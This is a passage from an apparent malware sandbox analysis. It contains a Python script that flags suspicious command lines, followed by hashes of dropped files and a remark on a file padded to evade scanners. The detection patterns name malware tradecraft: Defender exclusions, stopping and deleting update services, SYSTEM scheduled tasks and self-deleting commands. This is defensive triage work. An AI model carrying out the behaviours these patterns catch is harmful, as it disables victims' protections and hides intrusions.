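        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def classify(cmdline):
    """Return the set of behaviour tags a single command line triggers."""
    tags = set()
    low = cmdline.lower()
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        tags.add("encoded_powershell")
        low += " " + decoded.lower()      # inspect the decoded payload as well
    if "add-mppreference" in low and "-exclusionpath" in low:
        tags.add("defender_exclusion")
    if any(s in UPDATE_SERVICES for s in re.findall(r"sc\s+stop\s+([a-z0-9_]+)", low)):
        tags.add("update_service_stopped")
    if "reg delete" in low and any(
        s in UPDATE_SERVICES for s in re.findall(r"\\services\\([a-z0-9_]+)", low)
    ):
        tags.add("update_service_deleted")
    if re.search(r"powercfg\s+/x\s+-(?:hibernate|standby)-timeout-(?:ac|dc)\s+0\b", low):
        tags.add("sleep_disabled")
    if "register-scheduledtask" in low or re.search(r"schtasks\s+/create", low):
        tags.add("scheduled_task")
        if re.search(r"(?:-user|/ru)\s+'?system'?", low):
            tags.add("scheduled_task_as_system")
    # "timeout ... & del" and "choice ... & del" are the two self-delete idioms above.
    if re.search(r"(?:timeout|choice)[^&]*&\s*del\b", low):
        tags.add("self_delete")
    if "start-sleep" in low or re.search(r"timeout\s+/t\s+\d+", low):
        tags.add("execution_delay")
    return tags


def triage(cmdlines):
    """Return [(index, sorted tags)] for every line that raised at least one tag."""
    hits = []
    for i, line in enumerate(cmdlines):
        tags = classify(line)
        if tags:
            hits.append((i, sorted(tags)))
    return hits


if __name__ == "__main__":
    for i, tags in triage(SAMPLE_CMDLINES):
        print(f"[{i}] {', '.join(tags)}: {SAMPLE_CMDLINES[i][:72]}")
```

The decoded -ENC payload here is only a 20-second sleep, which is the point of decoding rather than alerting on -ENC alone: the encoded form is common in legitimate tooling, while a Defender exclusion on the whole profile or a reg delete under Services is not.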
Network
MITRE ATT&CK Enterprise v6
Downloads
(The report lists several files more than once, once per path they were written to; entries below are deduplicated by SHA256 with the number of listings in parentheses.)

Filesize: 3.6MB (listed 4 times)
MD5: 58fe5c1f5bb97d2ab8c07d9b2165d291
SHA1: 7fa1fd096e3e299a1d12620afb5f0e8bbac501fc
SHA256: 9ec7b6c726d9cafca8ab233f83133e06adf5a8af6898197ffc7c5ef54b402694
SHA512: ee7532ef1d4903eb4a6fddca47774358a67904ec49cbc700a2161c9f1f372bd02679fbeb4bada5cb6d940946084b080f7bbc138d4a8202fdbed5b9a8bc377e01

Filesize: 4.3MB (listed 3 times)
MD5: c4ab3149ef02a36d663699a8c541933e
SHA1: 67088f5eff9ec575775b711c9e3650d12d7f4d5c
SHA256: 0a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce
SHA512: 88b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4

Filesize: 7.2MB (listed 3 times)
MD5: c5e0fb4ecaa8a7481a283099d604f7a0
SHA1: df4b0c0cc823da2b0443076650c292b43dd9de33
SHA256: c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42
SHA512: 375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57

Filesize: 593KB
MD5: c8fd9be83bc728cc04beffafc2907fe9
SHA1: 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256: ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512: fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Filesize: 2.0MB
MD5: 1cc453cdf74f31e4d913ff9c10acdde2
SHA1: 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256: ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512: dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Filesize: 2KB
MD5: 622bf737a997b9a257f15dc3b9ee9da5
SHA1: 6beba023f9c081393b64de079969e948a47be8be
SHA256: bcefb9a5dbc47579f8b52cc37fd7591a0e20f00f0a7867df0232088db90273d7
SHA512: c1833c09ef0b3e643b8657874e8a99d7d154ac255c326d85fccba53aa57679e7dad93e61b3b8419937cb7ad936eab727c5edd6c4be6b988982c1d61505305e77

Filesize: 1KB
MD5: 13b08803e0bb671919478d178f19d6e2
SHA1: 9f8c1d2a16446f9ee1e3244f48d372aecccf4dd9
SHA256: bab001392f6a9fc257a302cf557c9f571c7b352f41aedda14b049976ee5fd1c9
SHA512: 2fe208b9958329734a5c6ce6aa526ee20d2c02d351927e75f85f27c2ffdc3c9e3413c17dc6e0dd9eefc3fb379e936b6bef2984a6e44ffafdc7600f590398016f

Filesize: 53KB
MD5: 06ad34f9739c5159b4d92d702545bd49
SHA1: 9152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256: 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512: c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Filesize: 16KB
MD5: 68d213788e7ead9edd268f3f2dc0b164
SHA1: ce040fe30a823e058322edd7783ded9587aaa384
SHA256: 50d8435b639de5637238ca7e93855f50b5cdd97a5348741e59a5f746f1e239b1
SHA512: b3b04202fd76981ccae9158b950daa668dd3e6fa41081b94342e166571a911fbb2960369d6bdb77481c1c3c59de4f351cf6ab34e1c171f13acd8d79936175801

Filesize: 944B
MD5: 41ac47e52d901688f4c46823eb12c6ae
SHA1: c80f6ae3584d3ebd94b753dd7ef1039ed541f078
SHA256: ab4a7be7634267aaf9c5db321924ee34f6e8c97267bf0844138bde233c409c8f
SHA512: 1ccb1c694c6d61027b223cf7c79ce5fdc6046a4a32dc15f22b722d6f063c127f4b5f5f3740f2c8b2447504f54d6e0d9afa47d202a61946e29bbcbac41d83c5b4

Filesize: 1KB
MD5: 58f473558345c4d2feab48d4999b148a
SHA1: a58fec1ddadb3cb692cd1bac3d21d09592ec58ee
SHA256: 69496654c76a65ba517bb7ee3bacb598a1e778aa7ee7807bf7318087d8d39d22
SHA512: f19f50701c05d050fa114e29544e77ce620c4f05619262781eb5a12906f3e4a0219d79ea574e2ace3bdad8c25346f2dad71e9768f64361321e9299061b7b87d0

Filesize: 322KB (listed 2 times)
MD5: cafc8351bc21c41083793db0f57b6aa8
SHA1: 8cb45d0e477aac3f7efdef9226c295a1fffde756
SHA256: 77cd68e6328a5b58a625e6190b56713e62b37db8fcae04d9b6f7021745c4603f
SHA512: 2fcff8f290c4c4c1ec5c33e7bad4db731d3a9f2106df92e8ceeaaf1ab6d4ada5957cee3b5e5f0cce2c5e2e8afb6f408e2fc37a437a77972950e49b489a2be514

Filesize: 1.4MB (listed 3 times)
MD5: 04a05e3080aba5e333c816493ef2635d
SHA1: 28d558491a0756f871b986130f0e7f86639877a2
SHA256: 95aee7feb92f8e8f236f65399712ed5be9ca5f52c6dbec65ab650c6db63f24fb
SHA512: a5316921db7096ca827d48b42c6aafd18dedfc6f5f4ccff73cec2bbd860f1ad2abefc6d97251ba3bff5d73f3ac72bd31ee092fec40d747a893baf614fd0ff498

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 740.2MB (listed 2 times)
MD5: 983e49c8c9adeb484670bc71e9eefaed
SHA1: 6d786c52134ab51def3d42eb3475338228e55f42
SHA256: 011cfb6a659e78e53c3ebb28d530e68637720e7d9fb67d918c34af0e17126ee3
SHA512: 8c8a4be1fe0f03e3876f636656d8182bdb4525f84f18bf4646a353aa0330a19fd0158bf76277d51de7587ed7b22292aab0ce56a5ea10f5e3168cfe1add7a6ef3

A 740.2MB artefact from a 213KB sample is worth checking for inflation: a file padded out with repeated or null bytes to exceed the upload limits of scanners and sandboxes. Entropy of the tail, or simply the compressed size, settles it; the report does not say which dropped file this is.